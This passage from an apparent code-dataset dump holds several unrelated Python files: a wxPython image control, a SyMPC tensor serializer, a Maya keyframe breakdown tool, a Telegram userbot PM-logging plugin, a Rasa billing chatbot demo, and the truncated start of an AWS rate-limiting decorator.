#---------------------------------------------------------------------------\n \n def Selected ( self, selected = None ):\n \"\"\" Gets/Sets the current selection state of the image.\n \"\"\"\n if selected is not None:\n selected = (selected != 0)\n if selected != self._selected:\n if selected:\n for control in self.GetParent().GetChildren():\n if (isinstance( control, ImageControl ) and \n control.Selected()):\n control.Selected( False )\n break\n self._selected = selected\n self.Refresh()\n return self._selected\n \n #---------------------------------------------------------------------------\n # Gets/Sets the current bitmap image: \n #---------------------------------------------------------------------------\n \n def Bitmap ( self, bitmap = None ):\n if bitmap is not None:\n if bitmap != self._bitmap:\n self._bitmap = bitmap\n self.Refresh()\n return self._bitmap\n \n #---------------------------------------------------------------------------\n # Gets/Sets the current click handler:\n #---------------------------------------------------------------------------\n \n def Handler ( self, handler = None ):\n \"\"\" Gets/Sets the current click handler.\n \"\"\"\n if handler is not None:\n if handler != self._handler:\n self._handler = handler\n self.Refresh()\n return self._handler\n \n #---------------------------------------------------------------------------\n # Handles the mouse entering the control: \n #---------------------------------------------------------------------------\n \n def _on_enter ( self, event = None ):\n \"\"\" Handles the mouse entering the control.\n \"\"\"\n if self._selected is not None:\n self._mouse_over = True\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the mouse leaving the control: \n #---------------------------------------------------------------------------\n \n def _on_leave ( self, event = None ):\n \"\"\" Handles the mouse leaving the control.\n \"\"\"\n if self._mouse_over:\n self._mouse_over = False\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the user pressing the mouse button: \n #---------------------------------------------------------------------------\n \n def _on_left_down ( self, event = None ):\n \"\"\" Handles the user pressing the mouse button.\n \"\"\"\n if self._selected is not None:\n self.CaptureMouse() \n self._button_down = True\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the user clicking the control: \n #---------------------------------------------------------------------------\n \n def _on_left_up ( self, event = None ):\n \"\"\" Handles the user clicking the control.\n \"\"\"\n need_refresh = self._button_down\n if need_refresh:\n self.ReleaseMouse() \n self._button_down = False\n \n if self._selected is not None:\n wdx, wdy = self.GetClientSizeTuple()\n x = event.GetX()\n y = event.GetY()\n if (0 <= x < wdx) and (0 <= y < wdy):\n if self._selected != -1:\n self.Selected( True )\n elif need_refresh:\n self.Refresh()\n if self._handler is not None:\n self._handler( self )\n return\n \n if need_refresh:\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the control being re-painted: \n #---------------------------------------------------------------------------\n \n def _on_paint ( self, event = None ):\n \"\"\" Handles the control being re-painted.\n \"\"\"\n wdc = 
wx.PaintDC( self )\n wdx, wdy = self.GetClientSizeTuple()\n bitmap = self._bitmap\n bdx = bitmap.GetWidth()\n bdy = bitmap.GetHeight()\n wdc.DrawBitmap( bitmap, (wdx - bdx) / 2, (wdy - bdy) / 2, True )\n \n pens = [ self._selectedPenLight, self._selectedPenDark ]\n bd = self._button_down\n if self._mouse_over:\n wdc.SetBrush( wx.TRANSPARENT_BRUSH )\n wdc.SetPen( pens[ bd ] )\n wdc.DrawLine( 0, 0, wdx, 0 ) \n wdc.DrawLine( 0, 1, 0, wdy )\n wdc.SetPen( pens[ 1 - bd ] )\n wdc.DrawLine( wdx - 1, 1, wdx - 1, wdy )\n wdc.DrawLine( 1, wdy - 1, wdx - 1, wdy - 1 )\n \n if self._selected == True:\n wdc.SetBrush( wx.TRANSPARENT_BRUSH )\n wdc.SetPen( pens[ bd ] )\n wdc.DrawLine( 1, 1, wdx - 1, 1 )\n wdc.DrawLine( 1, 1, 1, wdy - 1 )\n wdc.DrawLine( 2, 2, wdx - 2, 2 )\n wdc.DrawLine( 2, 2, 2, wdy - 2 )\n wdc.SetPen( pens[ 1 - bd ] )\n wdc.DrawLine( wdx - 2, 2, wdx - 2, wdy - 1 )\n wdc.DrawLine( 2, wdy - 2, wdx - 2, wdy - 2 )\n wdc.DrawLine( wdx - 3, 3, wdx - 3, wdy - 2 )\n wdc.DrawLine( 3, wdy - 3, wdx - 3, wdy - 3 ) \n\n"} {"ext": "py", "sha": "1a2f7e6f28d7911cef3cc3f506e871b8705a0374", "content": "# stdlib\n\n# stdlib\nimport dataclasses\nfrom uuid import UUID\n\n# third party\nimport sympc\nfrom sympc.config import Config\nfrom sympc.tensor import ShareTensor\n\n# syft absolute\nimport syft\n\n# syft relative\nfrom ...generate_wrapper import GenerateWrapper\nfrom ...proto.lib.sympc.share_tensor_pb2 import ShareTensor as ShareTensor_PB\nfrom ..python.primitive_factory import PrimitiveFactory\n\n\ndef object2proto(obj: object) -> ShareTensor_PB:\n share: ShareTensor = obj\n\n session_uuid = \"\"\n config = {}\n\n if share.session_uuid is not None:\n session_uuid = str(share.session_uuid)\n\n config = dataclasses.asdict(share.config)\n session_uuid_syft = session_uuid\n conf_syft = syft.serialize(\n PrimitiveFactory.generate_primitive(value=config), to_proto=True\n )\n proto = ShareTensor_PB(session_uuid=session_uuid_syft, config=conf_syft)\n\n tensor_data = getattr(share.tensor, \"data\", None)\n if tensor_data is not None:\n proto.tensor.CopyFrom(syft.serialize(share.tensor, to_proto=True))\n\n return proto\n\n\ndef proto2object(proto: ShareTensor_PB) -> ShareTensor:\n if proto.session_uuid:\n session = sympc.session.get_session(proto.session_uuid)\n if session is None:\n raise ValueError(f\"The session {proto.session_uuid} could not be found\")\n\n config = dataclasses.asdict(session.config)\n else:\n config = syft.deserialize(proto.config, from_proto=True)\n\n tensor = syft.deserialize(proto.tensor, from_proto=True)\n share = ShareTensor(data=None, config=Config(**config))\n\n if proto.session_uuid:\n share.session_uuid = UUID(proto.session_uuid)\n\n # Manually put the tensor since we do not want to re-encode it\n share.tensor = tensor\n\n return share\n\n\nGenerateWrapper(\n wrapped_type=ShareTensor,\n import_path=\"sympc.tensor.ShareTensor\",\n protobuf_scheme=ShareTensor_PB,\n type_object2proto=object2proto,\n type_proto2object=proto2object,\n)\n"} {"ext": "py", "sha": "1a2f7f4898f84c6a6a06274e0fa55c407c5cce85", "content": "# -= ml_breakdown.py =-\n# __ by Morgan Loomis\n# ____ ___ / / http://morganloomis.com\n# / __ `__ \\/ / Revision 4\n# / / / / / / / 2018-05-13\n# /_/ /_/ /_/_/ _________\n# /_________/\n# \n# ______________\n# - -/__ License __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Copyright 2018 Morgan Loomis\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy of \n# this software and associated documentation files (the 
\"Software\"), to deal in \n# the Software without restriction, including without limitation the rights to use, \n# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the \n# Software, and to permit persons to whom the Software is furnished to do so, \n# subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all \n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS \n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR \n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER \n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN \n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n# \n# ___________________\n# - -/__ Installation __/- - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Copy this file into your maya scripts directory, for example:\n# C:/Documents and Settings/user/My Documents/maya/scripts/ml_breakdown.py\n# \n# Run the tool in a python shell or shelf button by importing the module, \n# and then calling the primary function:\n# \n# import ml_breakdown\n# ml_breakdown.ui()\n# \n# \n# __________________\n# - -/__ Description __/- - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Blend a keyframe or pose with the next or previous keys, essentially creating a\n# breakdown pose that is weighted one way or the other.\n# \n# ____________\n# - -/__ Usage __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Press the \"Breakdown Dragger\" button to enter the dragger, and the cursor will\n# turn into a hand. Left-click and hold in the viewport, and then drag either left\n# or right to weight the key to the next or previous key. Press and hold the\n# middle mouse button to weight the key toward or away from the average of the\n# surrounding keys. Alternately, set the slider to the desired weight, and press\n# the Next, Previous or Average buttons to increment the breakdown. Right click\n# the buttons to assign to hotkeys. If you have no keys selected, the tool will\n# act only on curves that are visibile in the graph editor. If there are no keys\n# at the current frame, keys will be set.\n# \n# ____________\n# - -/__ Video __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# http://www.youtube.com/watch?v=D8yD4zbHTP8\n# \n# _________\n# - -/__ Ui __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# [Breakdown Dragger] : Drag in the viewport to weight a breakdown toward the next or previous frame.\n# [<<] : Weight toward the previous frame.\n# [Average] : Weight toward the average of the next and previous frame.\n# [>>] : Weight toward the next frame.\n# \n# ___________________\n# - -/__ Requirements __/- - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# This script requires the ml_utilities module, which can be downloaded here:\n# https://raw.githubusercontent.com/morganloomis/ml_tools/master/ml_utilities.py\n# \n# __________\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /_ Enjoy! 
_/- - -\n\n__author__ = 'Morgan Loomis'\n__license__ = 'MIT'\n__revision__ = 4\n__category__ = 'animation'\n\nshelfButton = {'annotation': 'Click to weight keys by dragging, double click to open UI.',\n 'command': 'import ml_breakdown;ml_breakdown.drag()',\n 'doubleClickCommand': 'import ml_breakdown;ml_breakdown.ui()',\n 'imageOverlayLabel': 'BD',\n 'menuItem': [['Breakdown UI', 'import ml_breakdown;ml_breakdown.ui()'],\n ['<< Previous', 'import ml_breakdown;ml_breakdown.weightPrevious()'],\n ['>> Next', 'import ml_breakdown;ml_breakdown.weightNext()'],\n ['Average', 'import ml_breakdown;ml_breakdown.weightAverage()']],\n 'order': 12}\n\nimport maya.cmds as mc\nfrom maya import OpenMaya\nfrom functools import partial\n\ntry:\n import ml_utilities as utl\n utl.upToDateCheck(32)\nexcept ImportError:\n result = mc.confirmDialog( title='Module Not Found', \n message='This tool requires the ml_utilities module. Once downloaded you will need to restart Maya.', \n button=['Download Module','Cancel'], \n defaultButton='Cancel', cancelButton='Cancel', dismissString='Cancel' )\n \n if result == 'Download Module':\n mc.showHelp('http://morganloomis.com/tool/ml_utilities/',absolute=True)\n\ndef ui():\n '''\n User interface for breakdown\n '''\n\n with utl.MlUi('ml_breakdown', 'Breakdown Tools', width=400, height=180, info='''Select objects.\nPress Breakdown Dragger to create a new key and weight it by dragging in the viewport.\nOtherwise use the increment buttons to nudge a key's value toward the next or previous key.''') as win:\n\n win.buttonWithPopup(label='Breakdown Dragger', command=drag, annotation='Drag in the viewport to weight a breakdown toward the next or previous frame.',\n shelfLabel='BDD')\n\n mc.separator(height=20)\n mc.floatSliderGrp('ml_breakdown_value_floatSlider', value=0.2, field=True, minValue=0, maxValue=2)\n mc.paneLayout(configuration='vertical3',separatorThickness=1)\n win.ButtonWithPopup(label='<<', command=weightPrevious, annotation='Weight toward the previous frame.', shelfLabel='<', shelfIcon='defaultTwoStackedLayout',\n readUI_toArgs={'weight':'ml_breakdown_value_floatSlider'})\n win.ButtonWithPopup(label='Average', command=weightAverage, annotation='Weight toward the average of the next and previous frame.', shelfLabel='><', shelfIcon='defaultTwoStackedLayout',\n readUI_toArgs={'weight':'ml_breakdown_value_floatSlider'})\n win.ButtonWithPopup(label='>>', command=weightNext, annotation='Weight toward the next frame.', shelfLabel='>', shelfIcon='defaultTwoStackedLayout',\n readUI_toArgs={'weight':'ml_breakdown_value_floatSlider'})\n\n\ndef quickBreakDownUI():\n winName = 'ml_quickBreakdownWin'\n if mc.window(winName, exists=True):\n mc.deleteUI(winName)\n\n mc.window(winName, title='ml :: QBD', iconName='Quick Breakdown', width=100, height=500)\n\n mc.columnLayout(adj=True)\n\n mc.paneLayout(configuration='vertical2', separatorThickness=1)\n mc.text('<<')\n mc.text('>>')\n mc.setParent('..')\n\n for v in (10,20,50,80,90,100,110,120,150):\n mc.paneLayout(configuration='vertical2',separatorThickness=1)\n\n mc.button(label=str(v)+' %', command=partial(weightPrevious,v/100.0))\n mc.button(label=str(v)+' %', command=partial(weightNext,v/100.0))\n mc.setParent('..')\n\n mc.showWindow(winName)\n\n mc.window(winName, edit=True, width=100, height=250)\n\n\ndef drag(*args):\n '''The primary command to run the tool'''\n BreakdownDragger()\n\n\ndef weightPrevious(weight=0.2, *args):\n weightBreakdownStep(direction='previous', weight=weight)\n\n\ndef weightAverage(weight=0.2, 
*args):\n weightBreakdownStep(direction='average', weight=weight)\n\n\ndef weightNext(weight=0.2, *args):\n weightBreakdownStep(direction='next', weight=weight)\n\n\ndef weightBreakdownStep(direction='next', weight=0.2):\n\n keySel = utl.KeySelection()\n if keySel.selectedKeys():\n pass\n elif keySel.visibleInGraphEditor():\n keySel.setKeyframe()\n elif keySel.keyedChannels():\n keySel.setKeyframe()\n\n if not keySel.curves:\n return\n\n times = list()\n values = list()\n\n data = list()\n\n for curve in keySel.curves:\n if keySel.selected:\n times = mc.keyframe(curve, query=True, timeChange=True, sl=True)\n values = mc.keyframe(curve, query=True, valueChange=True, sl=True)\n else:\n times = [keySel.time]\n values = mc.keyframe(curve, time=keySel.time, query=True, valueChange=True)\n\n for i,v in zip(times,values):\n nextTime = mc.findKeyframe(curve, time=(i,), which='next')\n n = mc.keyframe(curve, time=(nextTime,), query=True, valueChange=True)[0]\n prevTime = mc.findKeyframe(curve, time=(i,), which='previous')\n p = mc.keyframe(curve, time=(prevTime,), query=True, valueChange=True)[0]\n\n data.append([curve,i,v,n,p])\n\n for d in data:\n\n value = None\n if direction == 'next':\n value = d[2]+((d[3]-d[2])*weight)\n elif direction == 'previous':\n value = d[2]+((d[4]-d[2])*weight)\n elif direction == 'average':\n value = d[2]+(((d[3]+d[4])/2-d[2])*weight)\n else: break\n\n mc.keyframe(d[0], time=(d[1],), valueChange=value)\n\n\nclass BreakdownDragger(utl.Dragger):\n '''Creates the tool and manages the data'''\n\n def __init__(self,\n name='mlBreakdownDraggerContext',\n minValue=None,\n maxValue=None,\n defaultValue=0,\n title = 'Breakdown'):\n\n self.keySel = utl.KeySelection()\n if self.keySel.selectedKeys():\n pass\n elif self.keySel.visibleInGraphEditor():\n self.keySel.setKeyframe()\n elif self.keySel.keyedChannels():\n self.keySel.setKeyframe()\n\n if not self.keySel.curves:\n return\n\n utl.Dragger.__init__(self, defaultValue=defaultValue, minValue=minValue, maxValue=maxValue, name=name, title=title)\n\n\n #setup tangent type\n itt,ott = utl.getHoldTangentType()\n\n self.time = dict()\n self.value = dict()\n self.next = dict()\n self.prev = dict()\n self.average = dict()\n\n for curve in self.keySel.curves:\n if self.keySel.selected:\n self.time[curve] = mc.keyframe(curve, query=True, timeChange=True, sl=True)\n self.value[curve] = mc.keyframe(curve, query=True, valueChange=True, sl=True)\n else:\n self.time[curve] = self.keySel.time\n self.value[curve] = mc.keyframe(curve, time=self.keySel.time, query=True, valueChange=True)\n\n self.next[curve] = list()\n self.prev[curve] = list()\n self.average[curve] = list()\n\n for i in self.time[curve]:\n next = mc.findKeyframe(curve, time=(i,), which='next')\n prev = mc.findKeyframe(curve, time=(i,), which='previous')\n n = mc.keyframe(curve, time=(next,), query=True, valueChange=True)[0]\n p = mc.keyframe(curve, time=(prev,), query=True, valueChange=True)[0]\n\n self.next[curve].append(n)\n self.prev[curve].append(p)\n self.average[curve].append((n+p)/2)\n\n #set the tangents on this key, and the next and previous, so they flatten properly\n mc.keyTangent(curve, time=(i,), itt=itt, ott=ott)\n mc.keyTangent(curve, time=(next,), itt=itt)\n mc.keyTangent(curve, time=(prev,), ott=ott)\n\n self.setTool()\n self.drawString('Left: Weight Prev/Next, Middle: Weight Average')\n OpenMaya.MGlobal.displayWarning('Left: Weight Prev/Next, Middle: Weight Average')\n\n\n def dragLeft(self):\n '''This is activated by the left mouse button, and weights to 
the next or previous keys.'''\n\n #clamp it\n if self.x < -1:\n self.x = -1\n if self.x > 1:\n self.x = 1\n\n if self.x > 0:\n self.drawString('>> '+str(int(self.x*100))+' %')\n for curve in self.keySel.curves:\n for i,v,n in zip(self.time[curve],self.value[curve],self.next[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((n-v)*self.x))\n elif self.x <0:\n self.drawString('<< '+str(int(self.x*-100))+' %')\n for curve in self.keySel.curves:\n for i,v,p in zip(self.time[curve],self.value[curve],self.prev[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((p-v)*(-1*self.x)))\n\n\n def dragMiddle(self):\n '''This is activated by the middle mouse button, and weights to the average of the surrounding keys.'''\n\n #clamp it\n if self.x < -1:\n self.x = -1\n if self.x > 1:\n self.x = 1\n\n self.drawString('Average '+str(int(self.x*100))+' %')\n for curve in self.keySel.curves:\n for i,v,n in zip(self.time[curve],self.value[curve],self.average[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((n-v)*self.x))\n\n\n def dragShiftLeft(self):\n '''This is activated by Shift and the left mouse button, and weights to the next or previous keys, without clamping.'''\n if self.x > 0:\n self.drawString('>> '+str(int(self.x*100))+' %')\n for curve in self.keySel.curves:\n for i,v,n in zip(self.time[curve],self.value[curve],self.next[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((n-v)*self.x))\n elif self.x <0:\n self.drawString('<< '+str(int(self.x*-100))+' %')\n for curve in self.keySel.curves:\n for i,v,p in zip(self.time[curve],self.value[curve],self.prev[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((p-v)*(-1*self.x)))\n\n\nif __name__ == '__main__':\n quickBreakDownUI()\n\n# ______________________\n# - -/__ Revision History __/- - - - - - - - - - - - - - - - - - - - - - - -\n#\n# Revision 1: 2015-05-13 : First publish.\n#\n# Revision 2: 2015-05-13 : Documentation updates.\n#\n# Revision 3: 2018-02-17 : Updating license to MIT.\n#\n# Revision 4: 2018-05-13 : shelf support"} {"ext": "py", "sha": "1a2f7fb634fc3850ddf798a231305847e25ec0e1", "content": "import asyncio\nimport io\nimport userbot.plugins.sql_helper.no_log_pms_sql as no_log_pms_sql\nfrom telethon import events, errors, functions, types\nfrom userbot.utils import admin_cmd\nfrom userbot.uniborgConfig import Config\n\n\n\n@borg.on(admin_cmd(pattern=\"nccreatedch\"))\nasync def create_dump_channel(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n result = await borg(functions.channels.CreateChannelRequest( # pylint:disable=E0602\n title=f\"UniBorg-{borg.uid}-PM_LOGGR_BOT_API_ID-data\",\n about=\"PM_LOGGR_BOT_API_ID // Do Not Touch\",\n megagroup=False\n ))\n logger.info(result)\n created_chat_id = result.chats[0].id\n result = await borg.edit_admin( # pylint:disable=E0602\n entity=created_chat_id,\n user=Config.TG_BOT_USER_NAME_BF_HER,\n is_admin=True,\n title=\"Editor\"\n )\n logger.info(result)\n with io.BytesIO(str.encode(str(created_chat_id))) as out_file:\n out_file.name = \"PLEASE.IGNORE.dummy.file\"\n await borg.send_file(\n created_chat_id,\n out_file,\n force_document=True,\n allow_cache=False,\n caption=f\"Please set `PM_LOGGR_BOT_API_ID` to `{created_chat_id}`\",\n reply_to=1\n )\n await event.delete()\n else:\n await event.edit(f\"**is configured**. 
[please do not touch](https://t.me/c/{Config.PM_LOGGR_BOT_API_ID}/2)\")\n\n\n@borg.on(admin_cmd(pattern=\"nolog ?(.*)\"))\nasync def set_no_log_p_m(event):\n if Config.PM_LOGGR_BOT_API_ID is not None:\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if not no_log_pms_sql.is_approved(chat.id):\n no_log_pms_sql.approve(chat.id)\n await event.edit(\"Won't Log Messages from this chat\")\n await asyncio.sleep(3)\n await event.delete()\n\n\n@borg.on(admin_cmd(pattern=\"enlog ?(.*)\"))\nasync def set_no_log_p_m(event):\n if Config.PM_LOGGR_BOT_API_ID is not None:\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if no_log_pms_sql.is_approved(chat.id):\n no_log_pms_sql.disapprove(chat.id)\n await event.edit(\"Will Log Messages from this chat\")\n await asyncio.sleep(3)\n await event.delete()\n \n \n \n@borg.on(events.NewMessage(incoming=True))\nasync def on_new_private_message(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n\n if not event.is_private:\n return\n\n message_text = event.message.message\n message_media = event.message.media\n message_id = event.message.id\n message_to_id = event.message.to_id\n chat_id = event.chat_id\n # logger.info(chat_id)\n\n sender = await borg.get_entity(chat_id)\n if chat_id == borg.uid:\n # don't log Saved Messages\n return\n if sender.bot:\n # don't log bots\n return\n if sender.verified:\n # don't log verified accounts\n return\n\n if not no_log_pms_sql.is_approved(chat_id):\n # log pms\n await do_log_pm_action(chat_id, message_text, message_media)\n\n\n@borg.on(events.ChatAction(blacklist_chats=Config.UB_BLACK_LIST_CHAT))\nasync def on_new_chat_action_message(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n # logger.info(event.stringify())\n chat_id = event.chat_id\n message_id = event.action_message.id\n\n if event.created or event.user_added:\n added_by_users = event.action_message.action.users\n if borg.uid in added_by_users:\n added_by_user = event.action_message.from_id\n # someone added me to chat\n the_message = \"\"\n the_message += \"#MessageActionChatAddUser\\n\\n\"\n the_message += f\"[User](tg://user?id={added_by_user}): `{added_by_user}`\\n\"\n the_message += f\"[Private Link](https://t.me/c/{chat_id}/{message_id})\\n\"\n await borg.send_message(\n entity=Config.PM_LOGGR_BOT_API_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n # file=message_media,\n silent=True\n )\n\n\n@borg.on(events.Raw())\nasync def on_new_channel_message(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n if tgbot is None:\n return\n # logger.info(event.stringify())\n if isinstance(event, types.UpdateChannel):\n channel_id = event.channel_id\n message_id = 2\n # someone added me to channel\n # TODO: https://t.me/TelethonChat/153947\n the_message = \"\"\n the_message += \"#MessageActionChatAddUser\\n\\n\"\n # the_message += f\"[User](tg://user?id={added_by_user}): `{added_by_user}`\\n\"\n the_message += f\"[Private Link](https://t.me/c/{channel_id}/{message_id})\\n\"\n await borg.send_message(\n entity=Config.PM_LOGGR_BOT_API_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n # file=message_media,\n silent=True\n )\n\n\n\"\"\"@borg.on(events.Raw())\nasync def _(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n if tgbot is None:\n return\n logger.info(event.stringify())\"\"\"\n\n\n\"\"\"if tgbot is not None:\n @tgbot.on(events.Raw())\n async def _(event):\n if 
Config.PM_LOGGR_BOT_API_ID is None:\n return\n logger.info(event.stringify())\"\"\"\n\n\nasync def do_log_pm_action(chat_id, message_text, message_media):\n the_message = \"\"\n the_message += \"#LOG_PMs\\n\\n\"\n the_message += f\"[User](tg://user?id={chat_id}): {chat_id}\\n\"\n the_message += f\"Message: {message_text}\\n\"\n # the_message += f\"Media: {message_media}\"\n await borg.send_message(\n entity=Config.PM_LOGGR_BOT_API_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n file=message_media,\n silent=True\n )\n \n"} {"ext": "py", "sha": "1a2f80da119b07d1f38e99b55b0888ac9ab9787b", "content": "# -*- coding: UTF-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport warnings\n\nfrom rasa_core.actions import Action\nfrom rasa_core.agent import Agent\nfrom rasa_core.channels.console import ConsoleInputChannel\nfrom rasa_core.events import SlotSet\nfrom rasa_core.interpreter import RasaNLUInterpreter\nfrom rasa_core.policies.keras_policy import KerasPolicy\nfrom rasa_core.policies.memoization import MemoizationPolicy\n\nlogger = logging.getLogger(__name__)\n\nsupport_search = [\"话费\", \"流量\"]\n\n\ndef extract_item(item):\n \"\"\"\n check if item supported, this func just for lack of train data.\n :param item: item in track, eg: \"流量\"、\"查流量\"\n :return:\n \"\"\"\n if item is None:\n return None\n for name in support_search:\n if name in item:\n return name\n return None\n\n\nclass ActionSearchConsume(Action):\n def name(self):\n return 'action_search_consume'\n\n def run(self, dispatcher, tracker, domain):\n item = tracker.get_slot(\"item\")\n item = extract_item(item)\n if item is None:\n dispatcher.utter_message(\"您好,我现在只会查话费和流量\")\n dispatcher.utter_message(\"你可以这样问我:“帮我查话费”\")\n return []\n\n time = tracker.get_slot(\"time\")\n if time is None:\n dispatcher.utter_message(\"您想查询哪个月的话费?\")\n return []\n # query database here using item and time as key. 
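# A hedged sketch of the "query database" step mentioned in the comment above.
# Everything here is hypothetical: the time normalizer, the in-memory table and
# its keys merely stand in for a real billing lookup.
def normalize_month(time_slot):
    # map utterances such as "上个月" onto a canonical YYYY-MM key
    mapping = {"上个月": "2018-06", "这个月": "2018-07"}
    return mapping.get(time_slot, time_slot)

FAKE_BILLS = {("话费", "2018-06"): "二十八元", ("流量", "2018-06"): "二百八十兆"}

def query_consume(item, time_slot):
    # returns None when the (item, month) pair is unknown
    return FAKE_BILLS.get((item, normalize_month(time_slot)))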
but you may normalize time format first.\n dispatcher.utter_message(\"好,请稍等\")\n if item == \"流量\":\n dispatcher.utter_message(\"您好,您{}共使用{}二百八十兆,剩余三十兆。\".format(time, item))\n else:\n dispatcher.utter_message(\"您好,您{}共消费二十八元。\".format(time))\n return []\n\n\nclass MobilePolicy(KerasPolicy):\n def model_architecture(self, num_features, num_actions, max_history_len):\n \"\"\"Build a Keras model and return a compiled model.\"\"\"\n from keras.layers import LSTM, Activation, Masking, Dense\n from keras.models import Sequential\n\n n_hidden = 32 # size of hidden layer in LSTM\n # Build Model\n batch_shape = (None, max_history_len, num_features)\n\n model = Sequential()\n model.add(Masking(-1, batch_input_shape=batch_shape))\n model.add(LSTM(n_hidden, batch_input_shape=batch_shape))\n model.add(Dense(input_dim=n_hidden, output_dim=num_actions))\n model.add(Activation(\"softmax\"))\n\n model.compile(loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n logger.debug(model.summary())\n return model\n\n\ndef train_nlu():\n from rasa_nlu.training_data import load_data\n from rasa_nlu.config import RasaNLUModelConfig\n from rasa_nlu.model import Trainer\n from rasa_nlu import config\n\n training_data = load_data(\"data/nlu.json\")\n trainer = Trainer(config.load(\"data/nlu_model_config.json\"))\n trainer.train(training_data)\n model_directory = trainer.persist(\"models/\", project_name=\"ivr\", fixed_model_name=\"demo\")\n\n return model_directory\n\n\ndef train_dialogue(domain_file=\"data/domain.yml\",\n model_path=\"models/dialogue\",\n training_data_file=\"data/stories.md\"):\n from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,\n BinarySingleStateFeaturizer)\n featurizer = MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=5)\n agent = Agent(domain_file,\n policies=[MemoizationPolicy(max_history=5), KerasPolicy(featurizer)])\n\n agent.train(\n training_data_file,\n epochs=200,\n batch_size=16,\n augmentation_factor=50,\n validation_split=0.2\n )\n\n agent.persist(model_path)\n return agent\n\ndef run_ivrbot_online(input_channel=ConsoleInputChannel(),\n interpreter=RasaNLUInterpreter(\"models/ivr/demo\"),\n domain_file=\"data/domain.yml\",\n training_data_file=\"data/stories.md\"):\n from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,\n BinarySingleStateFeaturizer)\n featurizer = MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=5)\n agent = Agent(domain_file,\n policies=[MemoizationPolicy(max_history=5), KerasPolicy(featurizer)],\n interpreter=interpreter)\n\n agent.train_online(training_data_file,\n input_channel=input_channel,\n batch_size=50,\n epochs=200,\n max_training_samples=300)\n\n return agent\n\n\ndef run(serve_forever=True):\n agent = Agent.load(\"models/dialogue\",\n interpreter=RasaNLUInterpreter(\"models/ivr/demo\"))\n\n if serve_forever:\n agent.handle_channel(ConsoleInputChannel())\n return agent\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=\"INFO\")\n\n parser = argparse.ArgumentParser(\n description=\"starts the bot\")\n\n parser.add_argument(\n \"task\",\n choices=[\"train-nlu\", \"train-dialogue\", \"run\", \"online-train\"],\n help=\"what the bot should do - e.g. 
run or train?\")\n task = parser.parse_args().task\n\n # decide what to do based on first parameter of the script\n if task == \"train-nlu\":\n train_nlu()\n elif task == \"train-dialogue\":\n train_dialogue()\n elif task == \"run\":\n run()\n elif task == \"online-train\":\n run_ivrbot_online()\n else:\n warnings.warn(\"Need to pass either 'train-nlu', 'train-dialogue', 'run' or 'online-train' to use the script.\")\n exit(1)\n\n"} {"ext": "py", "sha": "1a2f81832ea5fcfcc38240a0cac064b8938c36d2", "content": "\"\"\"\n.. module: cloudaux.aws.decorators\n :platform: Unix\n :copyright: (c) 2018 by Netflix Inc., see AUTHORS for more\n :license: Apache, see LICENSE for more details.\n.. moduleauthor:: Patrick Kelley @monkeysecurity\n.. moduleauthor:: Mike Grima \n\"\"\"\nimport functools\nimport time\n\nimport boto\nimport botocore\n\nRATE_LIMITING_ERRORS = ['Throttling', 'RequestLimitExceeded', 'SlowDown', 'RequestThrottled']\n\n\ndef rate_limited(max_attempts=None, max_delay=4):\n def decorator(f):\n metadata = {\n 'count': 0,\n 'delay': 0\n }\n\n @functools.wraps(f)\n def decorated_function(*args, **kwargs):\n\n def increase_delay(e):\n if metadata['delay'] == 0:\n metadata['delay'] = 1\n elif metadata['delay'] < max_delay:\n metadata['delay'] *= 2\n\n if max_attempts and metadata['count'] > max_attempts:\n raise e\n\n metadata['count'] = 0\n while True:\n metadata['count'] += 1\n if metadata['delay'] > 0:\n 